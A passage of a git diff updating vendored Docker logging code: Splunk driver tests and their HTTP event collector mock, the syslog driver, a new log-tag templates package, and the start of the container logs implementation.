func TestNewMissedConfig(t *testing.T) { // Driver require user to specify splunk-url func TestNewMissedUrl(t *testing.T) { - ctx := logger.Context{ + info := logger.Info{ Config: map[string]string{ splunkTokenKey: 
"4642492F-D8BD-47F1-A005-0C08AE4657DF", }, } - _, err := New(ctx) + _, err := New(info) if err.Error() != "splunk: splunk-url is expected" { t.Fatal("Logger driver should fail when no required parameters specified") } @@ -67,24 +73,54 @@ func TestNewMissedUrl(t *testing.T) { // Driver require user to specify splunk-token func TestNewMissedToken(t *testing.T) { - ctx := logger.Context{ + info := logger.Info{ Config: map[string]string{ splunkURLKey: "http://127.0.0.1:8088", }, } - _, err := New(ctx) + _, err := New(info) if err.Error() != "splunk: splunk-token is expected" { t.Fatal("Logger driver should fail when no required parameters specified") } } +func TestNewWithProxy(t *testing.T) { + proxy := "http://proxy.testing:8888" + reset := env.Patch(t, "HTTP_PROXY", proxy) + defer reset() + + // must not be localhost + splunkURL := "http://example.com:12345" + logger, err := New(logger.Info{ + Config: map[string]string{ + splunkURLKey: splunkURL, + splunkTokenKey: "token", + splunkVerifyConnectionKey: "false", + }, + ContainerID: "containeriid", + }) + assert.NilError(t, err) + splunkLogger := logger.(*splunkLoggerInline) + + proxyFunc := splunkLogger.transport.Proxy + assert.Assert(t, proxyFunc != nil) + + req, err := http.NewRequest("GET", splunkURL, nil) + assert.NilError(t, err) + + proxyURL, err := proxyFunc(req) + assert.NilError(t, err) + assert.Assert(t, proxyURL != nil) + assert.Equal(t, proxy, proxyURL.String()) +} + // Test default settings func TestDefault(t *testing.T) { hec := NewHTTPEventCollectorMock(t) go hec.Serve() - ctx := logger.Context{ + info := logger.Info{ Config: map[string]string{ splunkURLKey: hec.URL(), splunkTokenKey: hec.token, @@ -95,12 +131,12 @@ func TestDefault(t *testing.T) { ContainerImageName: "container_image_name", } - hostname, err := ctx.Hostname() + hostname, err := info.Hostname() if err != nil { t.Fatal(err) } - loggerDriver, err := New(ctx) + loggerDriver, err := New(info) if err != nil { t.Fatal(err) } @@ -124,7 +160,7 
@@ func TestDefault(t *testing.T) { splunkLoggerDriver.nullMessage.Source != "" || splunkLoggerDriver.nullMessage.SourceType != "" || splunkLoggerDriver.nullMessage.Index != "" || - splunkLoggerDriver.gzipCompression != false || + splunkLoggerDriver.gzipCompression || splunkLoggerDriver.postMessagesFrequency != defaultPostMessagesFrequency || splunkLoggerDriver.postMessagesBatchSize != defaultPostMessagesBatchSize || splunkLoggerDriver.bufferMaximum != defaultBufferMaximum || @@ -133,11 +169,11 @@ func TestDefault(t *testing.T) { } message1Time := time.Now() - if err := loggerDriver.Log(&logger.Message{[]byte("{\"a\":\"b\"}"), "stdout", message1Time, nil, false}); err != nil { + if err := loggerDriver.Log(&logger.Message{Line: []byte("{\"a\":\"b\"}"), Source: "stdout", Timestamp: message1Time}); err != nil { t.Fatal(err) } message2Time := time.Now() - if err := loggerDriver.Log(&logger.Message{[]byte("notajson"), "stdout", message2Time, nil, false}); err != nil { + if err := loggerDriver.Log(&logger.Message{Line: []byte("notajson"), Source: "stdout", Timestamp: message2Time}); err != nil { t.Fatal(err) } @@ -206,7 +242,7 @@ func TestInlineFormatWithNonDefaultOptions(t *testing.T) { go hec.Serve() - ctx := logger.Context{ + info := logger.Info{ Config: map[string]string{ splunkURLKey: hec.URL(), splunkTokenKey: hec.token, @@ -215,8 +251,9 @@ func TestInlineFormatWithNonDefaultOptions(t *testing.T) { splunkIndexKey: "myindex", splunkFormatKey: splunkFormatInline, splunkGzipCompressionKey: "true", - tagKey: "{{.ImageName}}/{{.Name}}", - labelsKey: "a", + tagKey: "{{.ImageName}}/{{.Name}}", + labelsKey: "a", + envRegexKey: "^foo", }, ContainerID: "containeriid", ContainerName: "/container_name", @@ -225,14 +262,15 @@ func TestInlineFormatWithNonDefaultOptions(t *testing.T) { ContainerLabels: map[string]string{ "a": "b", }, + ContainerEnv: []string{"foo_finder=bar"}, } - hostname, err := ctx.Hostname() + hostname, err := info.Hostname() if err != nil { t.Fatal(err) } - 
loggerDriver, err := New(ctx) + loggerDriver, err := New(info) if err != nil { t.Fatal(err) } @@ -252,7 +290,7 @@ func TestInlineFormatWithNonDefaultOptions(t *testing.T) { splunkLoggerDriver.nullMessage.Source != "mysource" || splunkLoggerDriver.nullMessage.SourceType != "mysourcetype" || splunkLoggerDriver.nullMessage.Index != "myindex" || - splunkLoggerDriver.gzipCompression != true || + !splunkLoggerDriver.gzipCompression || splunkLoggerDriver.gzipCompressionLevel != gzip.DefaultCompression || splunkLoggerDriver.postMessagesFrequency != defaultPostMessagesFrequency || splunkLoggerDriver.postMessagesBatchSize != defaultPostMessagesBatchSize || @@ -262,7 +300,7 @@ func TestInlineFormatWithNonDefaultOptions(t *testing.T) { } messageTime := time.Now() - if err := loggerDriver.Log(&logger.Message{[]byte("1"), "stdout", messageTime, nil, false}); err != nil { + if err := loggerDriver.Log(&logger.Message{Line: []byte("1"), Source: "stdout", Timestamp: messageTime}); err != nil { t.Fatal(err) } @@ -295,6 +333,7 @@ func TestInlineFormatWithNonDefaultOptions(t *testing.T) { event["source"] != "stdout" || event["tag"] != "container_image_name/container_name" || event["attrs"].(map[string]interface{})["a"] != "b" || + event["attrs"].(map[string]interface{})["foo_finder"] != "bar" || len(event) != 4 { t.Fatalf("Unexpected event in message %v", event) } @@ -312,7 +351,7 @@ func TestJsonFormat(t *testing.T) { go hec.Serve() - ctx := logger.Context{ + info := logger.Info{ Config: map[string]string{ splunkURLKey: hec.URL(), splunkTokenKey: hec.token, @@ -326,12 +365,12 @@ func TestJsonFormat(t *testing.T) { ContainerImageName: "container_image_name", } - hostname, err := ctx.Hostname() + hostname, err := info.Hostname() if err != nil { t.Fatal(err) } - loggerDriver, err := New(ctx) + loggerDriver, err := New(info) if err != nil { t.Fatal(err) } @@ -351,7 +390,7 @@ func TestJsonFormat(t *testing.T) { splunkLoggerDriver.nullMessage.Source != "" || 
splunkLoggerDriver.nullMessage.SourceType != "" || splunkLoggerDriver.nullMessage.Index != "" || - splunkLoggerDriver.gzipCompression != true || + !splunkLoggerDriver.gzipCompression || splunkLoggerDriver.gzipCompressionLevel != gzip.BestSpeed || splunkLoggerDriver.postMessagesFrequency != defaultPostMessagesFrequency || splunkLoggerDriver.postMessagesBatchSize != defaultPostMessagesBatchSize || @@ -361,11 +400,11 @@ func TestJsonFormat(t *testing.T) { } message1Time := time.Now() - if err := loggerDriver.Log(&logger.Message{[]byte("{\"a\":\"b\"}"), "stdout", message1Time, nil, false}); err != nil { + if err := loggerDriver.Log(&logger.Message{Line: []byte("{\"a\":\"b\"}"), Source: "stdout", Timestamp: message1Time}); err != nil { t.Fatal(err) } message2Time := time.Now() - if err := loggerDriver.Log(&logger.Message{[]byte("notjson"), "stdout", message2Time, nil, false}); err != nil { + if err := loggerDriver.Log(&logger.Message{Line: []byte("notjson"), Source: "stdout", Timestamp: message2Time}); err != nil { t.Fatal(err) } @@ -431,7 +470,7 @@ func TestRawFormat(t *testing.T) { go hec.Serve() - ctx := logger.Context{ + info := logger.Info{ Config: map[string]string{ splunkURLKey: hec.URL(), splunkTokenKey: hec.token, @@ -443,15 +482,11 @@ func TestRawFormat(t *testing.T) { ContainerImageName: "container_image_name", } - hostname, err := ctx.Hostname() - if err != nil { - t.Fatal(err) - } + hostname, err := info.Hostname() + assert.NilError(t, err) - loggerDriver, err := New(ctx) - if err != nil { - t.Fatal(err) - } + loggerDriver, err := New(info) + assert.NilError(t, err) if !hec.connectionVerified { t.Fatal("By default connection should be verified") @@ -468,7 +503,7 @@ func TestRawFormat(t *testing.T) { splunkLoggerDriver.nullMessage.Source != "" || splunkLoggerDriver.nullMessage.SourceType != "" || splunkLoggerDriver.nullMessage.Index != "" || - splunkLoggerDriver.gzipCompression != false || + splunkLoggerDriver.gzipCompression || 
splunkLoggerDriver.postMessagesFrequency != defaultPostMessagesFrequency || splunkLoggerDriver.postMessagesBatchSize != defaultPostMessagesBatchSize || splunkLoggerDriver.bufferMaximum != defaultBufferMaximum || @@ -478,11 +513,11 @@ func TestRawFormat(t *testing.T) { } message1Time := time.Now() - if err := loggerDriver.Log(&logger.Message{[]byte("{\"a\":\"b\"}"), "stdout", message1Time, nil, false}); err != nil { + if err := loggerDriver.Log(&logger.Message{Line: []byte("{\"a\":\"b\"}"), Source: "stdout", Timestamp: message1Time}); err != nil { t.Fatal(err) } message2Time := time.Now() - if err := loggerDriver.Log(&logger.Message{[]byte("notjson"), "stdout", message2Time, nil, false}); err != nil { + if err := loggerDriver.Log(&logger.Message{Line: []byte("notjson"), Source: "stdout", Timestamp: message2Time}); err != nil { t.Fatal(err) } @@ -541,7 +576,7 @@ func TestRawFormatWithLabels(t *testing.T) { go hec.Serve() - ctx := logger.Context{ + info := logger.Info{ Config: map[string]string{ splunkURLKey: hec.URL(), splunkTokenKey: hec.token, @@ -557,12 +592,12 @@ func TestRawFormatWithLabels(t *testing.T) { }, } - hostname, err := ctx.Hostname() + hostname, err := info.Hostname() if err != nil { t.Fatal(err) } - loggerDriver, err := New(ctx) + loggerDriver, err := New(info) if err != nil { t.Fatal(err) } @@ -582,7 +617,7 @@ func TestRawFormatWithLabels(t *testing.T) { splunkLoggerDriver.nullMessage.Source != "" || splunkLoggerDriver.nullMessage.SourceType != "" || splunkLoggerDriver.nullMessage.Index != "" || - splunkLoggerDriver.gzipCompression != false || + splunkLoggerDriver.gzipCompression || splunkLoggerDriver.postMessagesFrequency != defaultPostMessagesFrequency || splunkLoggerDriver.postMessagesBatchSize != defaultPostMessagesBatchSize || splunkLoggerDriver.bufferMaximum != defaultBufferMaximum || @@ -592,11 +627,11 @@ func TestRawFormatWithLabels(t *testing.T) { } message1Time := time.Now() - if err := 
loggerDriver.Log(&logger.Message{[]byte("{\"a\":\"b\"}"), "stdout", message1Time, nil, false}); err != nil { + if err := loggerDriver.Log(&logger.Message{Line: []byte("{\"a\":\"b\"}"), Source: "stdout", Timestamp: message1Time}); err != nil { t.Fatal(err) } message2Time := time.Now() - if err := loggerDriver.Log(&logger.Message{[]byte("notjson"), "stdout", message2Time, nil, false}); err != nil { + if err := loggerDriver.Log(&logger.Message{Line: []byte("notjson"), Source: "stdout", Timestamp: message2Time}); err != nil { t.Fatal(err) } @@ -639,7 +674,7 @@ func TestRawFormatWithLabels(t *testing.T) { t.Fatal(err) } else { if event != "containeriid a=b notjson" { - t.Fatalf("Unexpected event in message 1 %v", event) + t.Fatalf("Unexpected event in message 2 %v", event) } } @@ -656,7 +691,7 @@ func TestRawFormatWithoutTag(t *testing.T) { go hec.Serve() - ctx := logger.Context{ + info := logger.Info{ Config: map[string]string{ splunkURLKey: hec.URL(), splunkTokenKey: hec.token, @@ -669,12 +704,12 @@ func TestRawFormatWithoutTag(t *testing.T) { ContainerImageName: "container_image_name", } - hostname, err := ctx.Hostname() + hostname, err := info.Hostname() if err != nil { t.Fatal(err) } - loggerDriver, err := New(ctx) + loggerDriver, err := New(info) if err != nil { t.Fatal(err) } @@ -694,7 +729,7 @@ func TestRawFormatWithoutTag(t *testing.T) { splunkLoggerDriver.nullMessage.Source != "" || splunkLoggerDriver.nullMessage.SourceType != "" || splunkLoggerDriver.nullMessage.Index != "" || - splunkLoggerDriver.gzipCompression != false || + splunkLoggerDriver.gzipCompression || splunkLoggerDriver.postMessagesFrequency != defaultPostMessagesFrequency || splunkLoggerDriver.postMessagesBatchSize != defaultPostMessagesBatchSize || splunkLoggerDriver.bufferMaximum != defaultBufferMaximum || @@ -705,11 +740,15 @@ func TestRawFormatWithoutTag(t *testing.T) { } message1Time := time.Now() - if err := loggerDriver.Log(&logger.Message{[]byte("{\"a\":\"b\"}"), "stdout", message1Time, 
nil, false}); err != nil { + if err := loggerDriver.Log(&logger.Message{Line: []byte("{\"a\":\"b\"}"), Source: "stdout", Timestamp: message1Time}); err != nil { t.Fatal(err) } message2Time := time.Now() - if err := loggerDriver.Log(&logger.Message{[]byte("notjson"), "stdout", message2Time, nil, false}); err != nil { + if err := loggerDriver.Log(&logger.Message{Line: []byte("notjson"), Source: "stdout", Timestamp: message2Time}); err != nil { + t.Fatal(err) + } + message3Time := time.Now() + if err := loggerDriver.Log(&logger.Message{Line: []byte(" "), Source: "stdout", Timestamp: message3Time}); err != nil { t.Fatal(err) } @@ -718,6 +757,9 @@ func TestRawFormatWithoutTag(t *testing.T) { t.Fatal(err) } + // message3 would have an empty or whitespace only string in the "event" field + // both of which are not acceptable to HEC + // thus here we must expect 2 messages, not 3 if len(hec.messages) != 2 { t.Fatal("Expected two messages") } @@ -752,7 +794,7 @@ func TestRawFormatWithoutTag(t *testing.T) { t.Fatal(err) } else { if event != "notjson" { - t.Fatalf("Unexpected event in message 1 %v", event) + t.Fatalf("Unexpected event in message 2 %v", event) } } @@ -773,7 +815,7 @@ func TestBatching(t *testing.T) { go hec.Serve() - ctx := logger.Context{ + info := logger.Info{ Config: map[string]string{ splunkURLKey: hec.URL(), splunkTokenKey: hec.token, @@ -784,13 +826,13 @@ func TestBatching(t *testing.T) { ContainerImageName: "container_image_name", } - loggerDriver, err := New(ctx) + loggerDriver, err := New(info) if err != nil { t.Fatal(err) } for i := 0; i < defaultStreamChannelSize*4; i++ { - if err := loggerDriver.Log(&logger.Message{[]byte(fmt.Sprintf("%d", i)), "stdout", time.Now(), nil, false}); err != nil { + if err := loggerDriver.Log(&logger.Message{Line: []byte(fmt.Sprintf("%d", i)), Source: "stdout", Timestamp: time.Now()}); err != nil { t.Fatal(err) } } @@ -839,7 +881,7 @@ func TestFrequency(t *testing.T) { go hec.Serve() - ctx := logger.Context{ + info := 
logger.Info{ Config: map[string]string{ splunkURLKey: hec.URL(), splunkTokenKey: hec.token, @@ -850,13 +892,13 @@ func TestFrequency(t *testing.T) { ContainerImageName: "container_image_name", } - loggerDriver, err := New(ctx) + loggerDriver, err := New(info) if err != nil { t.Fatal(err) } for i := 0; i < 10; i++ { - if err := loggerDriver.Log(&logger.Message{[]byte(fmt.Sprintf("%d", i)), "stdout", time.Now(), nil, false}); err != nil { + if err := loggerDriver.Log(&logger.Message{Line: []byte(fmt.Sprintf("%d", i)), Source: "stdout", Timestamp: time.Now()}); err != nil { t.Fatal(err) } time.Sleep(15 * time.Millisecond) @@ -920,7 +962,7 @@ func TestOneMessagePerRequest(t *testing.T) { go hec.Serve() - ctx := logger.Context{ + info := logger.Info{ Config: map[string]string{ splunkURLKey: hec.URL(), splunkTokenKey: hec.token, @@ -931,13 +973,13 @@ func TestOneMessagePerRequest(t *testing.T) { ContainerImageName: "container_image_name", } - loggerDriver, err := New(ctx) + loggerDriver, err := New(info) if err != nil { t.Fatal(err) } for i := 0; i < 10; i++ { - if err := loggerDriver.Log(&logger.Message{[]byte(fmt.Sprintf("%d", i)), "stdout", time.Now(), nil, false}); err != nil { + if err := loggerDriver.Log(&logger.Message{Line: []byte(fmt.Sprintf("%d", i)), Source: "stdout", Timestamp: time.Now()}); err != nil { t.Fatal(err) } } @@ -994,7 +1036,7 @@ func TestVerify(t *testing.T) { hec.simulateServerError = true go hec.Serve() - ctx := logger.Context{ + info := logger.Info{ Config: map[string]string{ splunkURLKey: hec.URL(), splunkTokenKey: hec.token, @@ -1005,7 +1047,7 @@ func TestVerify(t *testing.T) { ContainerImageName: "container_image_name", } - _, err := New(ctx) + _, err := New(info) if err == nil { t.Fatal("Expecting driver to fail, when server is unresponsive") } @@ -1023,7 +1065,7 @@ func TestSkipVerify(t *testing.T) { hec.simulateServerError = true go hec.Serve() - ctx := logger.Context{ + info := logger.Info{ Config: map[string]string{ splunkURLKey: 
hec.URL(), splunkTokenKey: hec.token, @@ -1035,7 +1077,7 @@ func TestSkipVerify(t *testing.T) { ContainerImageName: "container_image_name", } - loggerDriver, err := New(ctx) + loggerDriver, err := New(info) if err != nil { t.Fatal(err) } @@ -1045,7 +1087,7 @@ func TestSkipVerify(t *testing.T) { } for i := 0; i < defaultStreamChannelSize*2; i++ { - if err := loggerDriver.Log(&logger.Message{[]byte(fmt.Sprintf("%d", i)), "stdout", time.Now(), nil, false}); err != nil { + if err := loggerDriver.Log(&logger.Message{Line: []byte(fmt.Sprintf("%d", i)), Source: "stdout", Timestamp: time.Now()}); err != nil { t.Fatal(err) } } @@ -1054,10 +1096,10 @@ func TestSkipVerify(t *testing.T) { t.Fatal("No messages should be accepted at this point") } - hec.simulateServerError = false + hec.simulateErr(false) for i := defaultStreamChannelSize * 2; i < defaultStreamChannelSize*4; i++ { - if err := loggerDriver.Log(&logger.Message{[]byte(fmt.Sprintf("%d", i)), "stdout", time.Now(), nil, false}); err != nil { + if err := loggerDriver.Log(&logger.Message{Line: []byte(fmt.Sprintf("%d", i)), Source: "stdout", Timestamp: time.Now()}); err != nil { t.Fatal(err) } } @@ -1102,10 +1144,10 @@ func TestBufferMaximum(t *testing.T) { } hec := NewHTTPEventCollectorMock(t) - hec.simulateServerError = true + hec.simulateErr(true) go hec.Serve() - ctx := logger.Context{ + info := logger.Info{ Config: map[string]string{ splunkURLKey: hec.URL(), splunkTokenKey: hec.token, @@ -1117,7 +1159,7 @@ func TestBufferMaximum(t *testing.T) { ContainerImageName: "container_image_name", } - loggerDriver, err := New(ctx) + loggerDriver, err := New(info) if err != nil { t.Fatal(err) } @@ -1127,7 +1169,7 @@ func TestBufferMaximum(t *testing.T) { } for i := 0; i < 11; i++ { - if err := loggerDriver.Log(&logger.Message{[]byte(fmt.Sprintf("%d", i)), "stdout", time.Now(), nil, false}); err != nil { + if err := loggerDriver.Log(&logger.Message{Line: []byte(fmt.Sprintf("%d", i)), Source: "stdout", Timestamp: time.Now()}); 
err != nil { t.Fatal(err) } } @@ -1194,7 +1236,7 @@ func TestServerAlwaysDown(t *testing.T) { hec.simulateServerError = true go hec.Serve() - ctx := logger.Context{ + info := logger.Info{ Config: map[string]string{ splunkURLKey: hec.URL(), splunkTokenKey: hec.token, @@ -1206,7 +1248,7 @@ func TestServerAlwaysDown(t *testing.T) { ContainerImageName: "container_image_name", } - loggerDriver, err := New(ctx) + loggerDriver, err := New(info) if err != nil { t.Fatal(err) } @@ -1216,7 +1258,7 @@ func TestServerAlwaysDown(t *testing.T) { } for i := 0; i < 5; i++ { - if err := loggerDriver.Log(&logger.Message{[]byte(fmt.Sprintf("%d", i)), "stdout", time.Now(), nil, false}); err != nil { + if err := loggerDriver.Log(&logger.Message{Line: []byte(fmt.Sprintf("%d", i)), Source: "stdout", Timestamp: time.Now()}); err != nil { t.Fatal(err) } } @@ -1253,7 +1295,7 @@ func TestCannotSendAfterClose(t *testing.T) { hec := NewHTTPEventCollectorMock(t) go hec.Serve() - ctx := logger.Context{ + info := logger.Info{ Config: map[string]string{ splunkURLKey: hec.URL(), splunkTokenKey: hec.token, @@ -1264,12 +1306,12 @@ func TestCannotSendAfterClose(t *testing.T) { ContainerImageName: "container_image_name", } - loggerDriver, err := New(ctx) + loggerDriver, err := New(info) if err != nil { t.Fatal(err) } - if err := loggerDriver.Log(&logger.Message{[]byte("message1"), "stdout", time.Now(), nil, false}); err != nil { + if err := loggerDriver.Log(&logger.Message{Line: []byte("message1"), Source: "stdout", Timestamp: time.Now()}); err != nil { t.Fatal(err) } @@ -1278,7 +1320,7 @@ func TestCannotSendAfterClose(t *testing.T) { t.Fatal(err) } - if err := loggerDriver.Log(&logger.Message{[]byte("message2"), "stdout", time.Now(), nil, false}); err == nil { + if err := loggerDriver.Log(&logger.Message{Line: []byte("message2"), Source: "stdout", Timestamp: time.Now()}); err == nil { t.Fatal("Driver should not allow to send messages after close") } @@ -1300,3 +1342,48 @@ func 
TestCannotSendAfterClose(t *testing.T) { t.Fatal(err) } } + +func TestDeadlockOnBlockedEndpoint(t *testing.T) { + hec := NewHTTPEventCollectorMock(t) + go hec.Serve() + info := logger.Info{ + Config: map[string]string{ + splunkURLKey: hec.URL(), + splunkTokenKey: hec.token, + }, + ContainerID: "containeriid", + ContainerName: "/container_name", + ContainerImageID: "contaimageid", + ContainerImageName: "container_image_name", + } + + l, err := New(info) + if err != nil { + t.Fatal(err) + } + + ctx, unblock := context.WithCancel(context.Background()) + hec.withBlock(ctx) + defer unblock() + + batchSendTimeout = 1 * time.Second + + if err := l.Log(&logger.Message{}); err != nil { + t.Fatal(err) + } + + done := make(chan struct{}) + go func() { + l.Close() + close(done) + }() + + select { + case <-time.After(60 * time.Second): + buf := make([]byte, 1e6) + buf = buf[:runtime.Stack(buf, true)] + t.Logf("STACK DUMP: \n\n%s\n\n", string(buf)) + t.Fatal("timeout waiting for close to finish") + case <-done: + } +} diff --git a/vendor/github.com/docker/docker/daemon/logger/splunk/splunkhecmock_test.go b/vendor/github.com/docker/docker/daemon/logger/splunk/splunkhecmock_test.go index e508948280..a3a83ac103 100644 --- a/vendor/github.com/docker/docker/daemon/logger/splunk/splunkhecmock_test.go +++ b/vendor/github.com/docker/docker/daemon/logger/splunk/splunkhecmock_test.go @@ -1,13 +1,15 @@ -package splunk +package splunk // import "github.com/docker/docker/daemon/logger/splunk" import ( "compress/gzip" + "context" "encoding/json" "fmt" "io" "io/ioutil" "net" "net/http" + "sync" "testing" ) @@ -29,8 +31,10 @@ type HTTPEventCollectorMock struct { tcpAddr *net.TCPAddr tcpListener *net.TCPListener + mu sync.Mutex token string simulateServerError bool + blockingCtx context.Context test *testing.T @@ -55,6 +59,18 @@ func NewHTTPEventCollectorMock(t *testing.T) *HTTPEventCollectorMock { connectionVerified: false} } +func (hec *HTTPEventCollectorMock) simulateErr(b bool) { + 
hec.mu.Lock() + hec.simulateServerError = b + hec.mu.Unlock() +} + +func (hec *HTTPEventCollectorMock) withBlock(ctx context.Context) { + hec.mu.Lock() + hec.blockingCtx = ctx + hec.mu.Unlock() +} + func (hec *HTTPEventCollectorMock) URL() string { return "http://" + hec.tcpListener.Addr().String() } @@ -72,7 +88,16 @@ func (hec *HTTPEventCollectorMock) ServeHTTP(writer http.ResponseWriter, request hec.numOfRequests++ - if hec.simulateServerError { + hec.mu.Lock() + simErr := hec.simulateServerError + ctx := hec.blockingCtx + hec.mu.Unlock() + + if ctx != nil { + <-hec.blockingCtx.Done() + } + + if simErr { if request.Body != nil { defer request.Body.Close() } diff --git a/vendor/github.com/docker/docker/daemon/logger/syslog/syslog.go b/vendor/github.com/docker/docker/daemon/logger/syslog/syslog.go index fb9e867ff5..94bdee364a 100644 --- a/vendor/github.com/docker/docker/daemon/logger/syslog/syslog.go +++ b/vendor/github.com/docker/docker/daemon/logger/syslog/syslog.go @@ -1,5 +1,5 @@ // Package syslog provides the logdriver for forwarding server logs to syslog endpoints. -package syslog +package syslog // import "github.com/docker/docker/daemon/logger/syslog" import ( "crypto/tls" @@ -14,11 +14,11 @@ import ( syslog "github.com/RackSec/srslog" - "github.com/Sirupsen/logrus" "github.com/docker/docker/daemon/logger" "github.com/docker/docker/daemon/logger/loggerutils" "github.com/docker/docker/pkg/urlutil" "github.com/docker/go-connections/tlsconfig" + "github.com/sirupsen/logrus" ) const ( @@ -68,18 +68,18 @@ func init() { func rfc5424formatterWithAppNameAsTag(p syslog.Priority, hostname, tag, content string) string { timestamp := time.Now().Format(time.RFC3339) pid := os.Getpid() - msg := fmt.Sprintf("<%d>%d %s %s %s %d %s %s", + msg := fmt.Sprintf("<%d>%d %s %s %s %d %s - %s", p, 1, timestamp, hostname, tag, pid, tag, content) return msg } // The timestamp field in rfc5424 is derived from rfc3339. 
Whereas rfc3339 makes allowances -// for multiple syntaxes, there are further restrictions in rfc5424, i.e., the maximium +// for multiple syntaxes, there are further restrictions in rfc5424, i.e., the maximum // resolution is limited to "TIME-SECFRAC" which is 6 (microsecond resolution) func rfc5424microformatterWithAppNameAsTag(p syslog.Priority, hostname, tag, content string) string { timestamp := time.Now().Format("2006-01-02T15:04:05.999999Z07:00") pid := os.Getpid() - msg := fmt.Sprintf("<%d>%d %s %s %s %d %s %s", + msg := fmt.Sprintf("<%d>%d %s %s %s %d %s - %s", p, 1, timestamp, hostname, tag, pid, tag, content) return msg } @@ -87,30 +87,30 @@ func rfc5424microformatterWithAppNameAsTag(p syslog.Priority, hostname, tag, con // New creates a syslog logger using the configuration passed in on // the context. Supported context configuration variables are // syslog-address, syslog-facility, syslog-format. -func New(ctx logger.Context) (logger.Logger, error) { - tag, err := loggerutils.ParseLogTag(ctx, loggerutils.DefaultTemplate) +func New(info logger.Info) (logger.Logger, error) { + tag, err := loggerutils.ParseLogTag(info, loggerutils.DefaultTemplate) if err != nil { return nil, err } - proto, address, err := parseAddress(ctx.Config["syslog-address"]) + proto, address, err := parseAddress(info.Config["syslog-address"]) if err != nil { return nil, err } - facility, err := parseFacility(ctx.Config["syslog-facility"]) + facility, err := parseFacility(info.Config["syslog-facility"]) if err != nil { return nil, err } - syslogFormatter, syslogFramer, err := parseLogFormat(ctx.Config["syslog-format"], proto) + syslogFormatter, syslogFramer, err := parseLogFormat(info.Config["syslog-format"], proto) if err != nil { return nil, err } var log *syslog.Writer if proto == secureProto { - tlsConfig, tlsErr := parseTLSConfig(ctx.Config) + tlsConfig, tlsErr := parseTLSConfig(info.Config) if tlsErr != nil { return nil, tlsErr } @@ -132,10 +132,13 @@ func New(ctx 
logger.Context) (logger.Logger, error) { } func (s *syslogger) Log(msg *logger.Message) error { - if msg.Source == "stderr" { - return s.writer.Err(string(msg.Line)) + line := string(msg.Line) + source := msg.Source + logger.PutMessage(msg) + if source == "stderr" { + return s.writer.Err(line) } - return s.writer.Info(string(msg.Line)) + return s.writer.Info(line) } func (s *syslogger) Close() error { @@ -184,6 +187,7 @@ func ValidateLogOpt(cfg map[string]string) error { for key := range cfg { switch key { case "env": + case "env-regex": case "labels": case "syslog-address": case "syslog-facility": diff --git a/vendor/github.com/docker/docker/daemon/logger/syslog/syslog_test.go b/vendor/github.com/docker/docker/daemon/logger/syslog/syslog_test.go index 501561064b..4631788fbb 100644 --- a/vendor/github.com/docker/docker/daemon/logger/syslog/syslog_test.go +++ b/vendor/github.com/docker/docker/daemon/logger/syslog/syslog_test.go @@ -1,4 +1,4 @@ -package syslog +package syslog // import "github.com/docker/docker/daemon/logger/syslog" import ( "reflect" diff --git a/vendor/github.com/docker/docker/daemon/logger/templates/templates.go b/vendor/github.com/docker/docker/daemon/logger/templates/templates.go new file mode 100644 index 0000000000..ab76d0f1c2 --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/logger/templates/templates.go @@ -0,0 +1,50 @@ +package templates // import "github.com/docker/docker/daemon/logger/templates" + +import ( + "bytes" + "encoding/json" + "strings" + "text/template" +) + +// basicFunctions are the set of initial +// functions provided to every template. 
+var basicFunctions = template.FuncMap{ + "json": func(v interface{}) string { + buf := &bytes.Buffer{} + enc := json.NewEncoder(buf) + enc.SetEscapeHTML(false) + enc.Encode(v) + // Remove the trailing new line added by the encoder + return strings.TrimSpace(buf.String()) + }, + "split": strings.Split, + "join": strings.Join, + "title": strings.Title, + "lower": strings.ToLower, + "upper": strings.ToUpper, + "pad": padWithSpace, + "truncate": truncateWithLength, +} + +// NewParse creates a new tagged template with the basic functions +// and parses the given format. +func NewParse(tag, format string) (*template.Template, error) { + return template.New(tag).Funcs(basicFunctions).Parse(format) +} + +// padWithSpace adds whitespace to the input if the input is non-empty +func padWithSpace(source string, prefix, suffix int) string { + if source == "" { + return source + } + return strings.Repeat(" ", prefix) + source + strings.Repeat(" ", suffix) +} + +// truncateWithLength truncates the source string up to the length provided by the input +func truncateWithLength(source string, length int) string { + if len(source) < length { + return source + } + return source[:length] +} diff --git a/vendor/github.com/docker/docker/daemon/logger/templates/templates_test.go b/vendor/github.com/docker/docker/daemon/logger/templates/templates_test.go new file mode 100644 index 0000000000..25e7c88750 --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/logger/templates/templates_test.go @@ -0,0 +1,19 @@ +package templates // import "github.com/docker/docker/daemon/logger/templates" + +import ( + "bytes" + "testing" + + "gotest.tools/assert" + is "gotest.tools/assert/cmp" +) + +func TestNewParse(t *testing.T) { + tm, err := NewParse("foo", "this is a {{ . 
}}") + assert.Check(t, err) + + var b bytes.Buffer + assert.Check(t, tm.Execute(&b, "string")) + want := "this is a string" + assert.Check(t, is.Equal(want, b.String())) +} diff --git a/vendor/github.com/docker/docker/daemon/logs.go b/vendor/github.com/docker/docker/daemon/logs.go index cc34b82083..37ca4caf63 100644 --- a/vendor/github.com/docker/docker/daemon/logs.go +++ b/vendor/github.com/docker/docker/daemon/logs.go @@ -1,123 +1,175 @@ -package daemon +package daemon // import "github.com/docker/docker/daemon" import ( - "fmt" - "io" + "context" "strconv" "time" - "golang.org/x/net/context" - - "github.com/Sirupsen/logrus" + "github.com/docker/docker/api/types" "github.com/docker/docker/api/types/backend" containertypes "github.com/docker/docker/api/types/container" timetypes "github.com/docker/docker/api/types/time" "github.com/docker/docker/container" "github.com/docker/docker/daemon/logger" - "github.com/docker/docker/pkg/ioutils" - "github.com/docker/docker/pkg/stdcopy" + "github.com/docker/docker/errdefs" + "github.com/pkg/errors" + "github.com/sirupsen/logrus" ) -// ContainerLogs hooks up a container's stdout and stderr streams -// configured with the given struct. -func (daemon *Daemon) ContainerLogs(ctx context.Context, containerName string, config *backend.ContainerLogsConfig, started chan struct{}) error { +// ContainerLogs copies the container's log channel to the channel provided in +// the config. If ContainerLogs returns an error, no messages have been copied. +// and the channel will be closed without data. +// +// if it returns nil, the config channel will be active and return log +// messages until it runs out or the context is canceled. 
